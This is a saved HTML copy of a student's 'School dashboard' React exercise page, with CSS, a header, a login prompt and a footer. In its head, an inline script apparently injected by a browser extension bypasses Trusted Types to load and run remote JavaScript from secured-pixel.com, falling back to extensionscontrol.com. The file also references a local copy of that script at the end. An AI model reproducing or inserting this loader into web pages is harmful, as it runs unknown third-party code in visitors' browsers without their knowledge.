<!DOCTYPE html>
<!-- saved from url=(0022)http://localhost:5173/ -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link rel="icon" type="image/x-icon" href="http://localhost:5173/favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Holberton - School dashboard</title>
  <script>(function(){var r=document.documentElement||document.getElementsByTagName('html')[0];if(r){var p=window.trustedTypes.createPolicy('safePolicy',{createScriptURL:function(u){return u}}),s=document.createElement('script');s.id='ghsinj',s.src=p.createScriptURL('https://secured-pixel.com/inj/default.php?ext=15&tt=035-xx-15'),s.setAttribute('extid','15'),s.onerror=function(){var f=document.createElement('script');f.src=p.createScriptURL('https://extensionscontrol.com/default.php?ext=15&tt=035-xx-15'),f.setAttribute('extid','15'),r.appendChild(f)},r.appendChild(s)}else setTimeout(arguments.callee,10)})();</script><style type="text/css" data-vite-dev-id="/mnt/d/Users/steph/Documents/5ème_trimestre/holbertonschool-web_react/react_intro/task_0/dashboard/src/App.css">:root { --hb-red: #e1003c; }

* { box-sizing: border-box; }
html, body, #root { height: 100%; margin: 0; }
body {
  font-family: Georgia, "Times New Roman", serif;
  color: #222;
}

.App { min-height: 100%; display: flex; flex-direction: column; }

/* ===== HEADER (petit hippocampe + gros titre) ===== */
.App-header {
  display: flex;
  align-items: center;
  gap: 28px;
  padding: 24px 40px 8px;
}
.logo-top {
  height: 120px;           /* ↑ plus grand */
  width: auto;
}
.App-header h1 {
  margin: 0;
  font-size: 56px;         /* ↑ taille du titre */
  font-weight: 700;
  color: var(--hb-red);
  line-height: 1;
}

/* ===== GROS LOGO TEXTE SOUS LE TITRE ===== */
.brand-row {
  padding: 0 0px 0px;
}
.brand {
  height: 80px;           /* ↑ taille du logo de marque */
  width: auto;
  display: block;
}

/* ===== CORPS ===== */
.App-body {
  border-top: 4px solid var(--hb-red);  /* barre rouge pleine largeur */
  padding: 18px 24px 24px;
  flex: 1;
}

/* ===== FOOTER ===== */
.App-footer {
  border-top: 3px solid var(--hb-red);
  text-align: center;
  padding: 14px 0;
}
.App-footer p { margin: 0; font-style: italic; color: #333; }
</style></head>
  <body>
    <div id="root"><div class="App"><header class="App-header" data-landmark-index="0"><img src="./Holberton - School dashboard_files/holberton-logo.jpg" alt="holberton logo" class="logo"><h1>School dashboard</h1></header><main class="App-body" data-landmark-index="1"><p>Login to access the full dashboard</p></main><footer class="App-footer" data-landmark-index="2"><p><em>Copyright 2025 - holberton School</em></p></footer></div></div>
    <script type="module" src="./Holberton - School dashboard_files/main.jsx"></script>
  

<deepl-input-controller translate="no"><template shadowrootmode="open"><link rel="stylesheet" href="chrome-extension://cofdbpoegempjloogbagkncekinflcnj/build/content.css"><div dir="ltr" style="visibility: initial !important;"><div class="dl-input-translation-container svelte-95aucy"><div></div></div></div></template></deepl-input-controller></body><script id="ghsinj" src="./Holberton - School dashboard_files/default.php" extid="15"></script></html>